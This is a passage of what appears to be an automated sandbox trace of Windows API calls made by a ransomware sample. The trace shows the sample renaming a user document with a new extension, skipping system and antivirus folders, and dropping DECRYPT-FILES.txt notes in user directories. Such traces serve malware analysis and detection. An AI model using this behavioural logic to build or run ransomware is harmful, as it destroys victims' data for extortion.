(lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.947] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.947] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.947] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.947] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.947] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.947] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.947] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.947] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.947] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.947] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.947] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.947] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.947] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.947] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.947] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.947] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.947] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.947] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.947] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.947] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.947] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.947] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.947] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.948] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.948] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.948] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.948] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.948] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.948] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.948] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.948] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.948] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.948] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.948] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.948] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.948] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.948] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.948] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.948] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.948] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.948] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.948] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.948] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.948] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.948] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.948] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.948] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.948] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.948] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.948] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.948] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.948] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.948] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.948] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.948] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.948] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.948] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.949] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.949] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xMaUz.pptx") returned 50 [0084.949] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xMaUz.pptx.bnLNf") returned 56 [0084.949] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xMaUz.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xmauz.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xMaUz.pptx.bnLNf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xmauz.pptx.bnlnf"), dwFlags=0x0) returned 1 [0084.950] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.950] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.950] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.950] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7088860, ftCreationTime.dwHighDateTime=0x1d547b2, ftLastAccessTime.dwLowDateTime=0x4b046950, ftLastAccessTime.dwHighDateTime=0x1d5158d, ftLastWriteTime.dwLowDateTime=0x4b046950, ftLastWriteTime.dwHighDateTime=0x1d5158d, nFileSizeHigh=0x0, nFileSizeLow=0x6f56, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xMaUz.pptx", cAlternateFileName="XMAUZ~1.PPT")) returned 0 [0084.950] FindClose (in: hFindFile=0x5f8b98 | out: hFindFile=0x5f8b98) returned 1 [0084.950] CloseHandle (hObject=0x430) returned 1 [0084.951] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0084.951] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1 [0084.951] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1 [0084.951] lstrcatW (in: lpString1="Downloads", lpString2="\\" | out: lpString1="Downloads\\") returned="Downloads\\" [0084.951] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Downloads\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" [0084.951] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="\\Program Files") returned 0x0 [0084.951] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch=":\\Windows") returned 0x0 [0084.951] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="\\Games\\") returned 0x0 [0084.951] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="\\Tor Browser\\") returned 0x0 [0084.951] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="\\ProgramData\\") returned 0x0 [0084.951] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0084.951] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0084.951] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0084.951] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="\\All Users") returned 0x0 [0084.951] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="\\IETldCache\\") returned 0x0 [0084.951] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="\\Local Settings\\") returned 0x0 [0084.951] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="\\AppData\\Local") returned 0x0 [0084.951] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="AhnLab") returned 0x0 [0084.951] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0084.951] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned 40 [0084.951] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.951] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\\\jkbimi8.tmp") returned 52 [0084.951] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0084.952] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned 40 [0084.952] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0084.952] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\\\DECRYPT-FILES.txt") returned 58 [0084.952] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0084.952] WriteFile (in: hFile=0x434, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e92c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e92c*=0x23fc, lpOverlapped=0x0) returned 1 [0084.954] CloseHandle (hObject=0x434) returned 1 [0084.954] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned 40 [0084.954] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*" [0084.954] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaed3e940, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaed3e940, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b98 [0084.958] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.958] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaed3e940, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaed3e940, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.958] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.958] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.958] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaed3e940, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaed3e940, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaed3e940, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0084.958] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0084.958] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0084.958] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0084.958] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0084.958] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0084.958] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0084.958] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaed3e940, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaed3e940, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaed3e940, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0084.958] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0084.958] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0084.958] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0084.958] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0084.958] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0084.958] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0084.958] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0084.959] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0084.959] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0084.959] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0084.959] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.959] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0084.959] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0084.959] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0084.959] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0084.959] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned 40 [0084.959] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.959] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" [0084.959] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\jkbimi8.tmp" [0084.959] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.959] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0084.959] CloseHandle (hObject=0x0) returned 0 [0084.960] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.960] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaed3e940, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaed3e940, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaed3e940, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0084.960] FindClose (in: hFindFile=0x5f8b98 | out: hFindFile=0x5f8b98) returned 1 [0084.960] CloseHandle (hObject=0x430) returned 1 [0084.960] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0084.960] lstrcmpW (lpString1="Favorites", lpString2=".") returned 1 [0084.960] lstrcmpW (lpString1="Favorites", lpString2="..") returned 1 [0084.960] lstrcatW (in: lpString1="Favorites", lpString2="\\" | out: lpString1="Favorites\\") returned="Favorites\\" [0084.960] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Favorites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0084.960] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="\\Program Files") returned 0x0 [0084.960] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch=":\\Windows") returned 0x0 [0084.960] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="\\Games\\") returned 0x0 [0084.960] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="\\Tor Browser\\") returned 0x0 [0084.960] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="\\ProgramData\\") returned 0x0 [0084.960] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0084.960] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0084.960] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0084.960] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="\\All Users") returned 0x0 [0084.960] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="\\IETldCache\\") returned 0x0 [0084.960] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="\\Local Settings\\") returned 0x0 [0084.960] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="\\AppData\\Local") returned 0x0 [0084.960] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="AhnLab") returned 0x0 [0084.961] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0084.961] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned 40 [0084.961] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.961] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\\\jkbimi8.tmp") returned 52 [0084.961] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0084.961] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned 40 [0084.961] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0084.961] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\\\DECRYPT-FILES.txt") returned 58 [0084.961] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0084.961] WriteFile (in: hFile=0x434, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e92c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e92c*=0x23fc, lpOverlapped=0x0) returned 1 [0084.962] CloseHandle (hObject=0x434) returned 1 [0084.962] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned 40 [0084.962] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*" [0084.963] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaed64aa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaed64aa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b98 [0084.963] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.963] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaed64aa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaed64aa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.963] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.963] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.963] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: 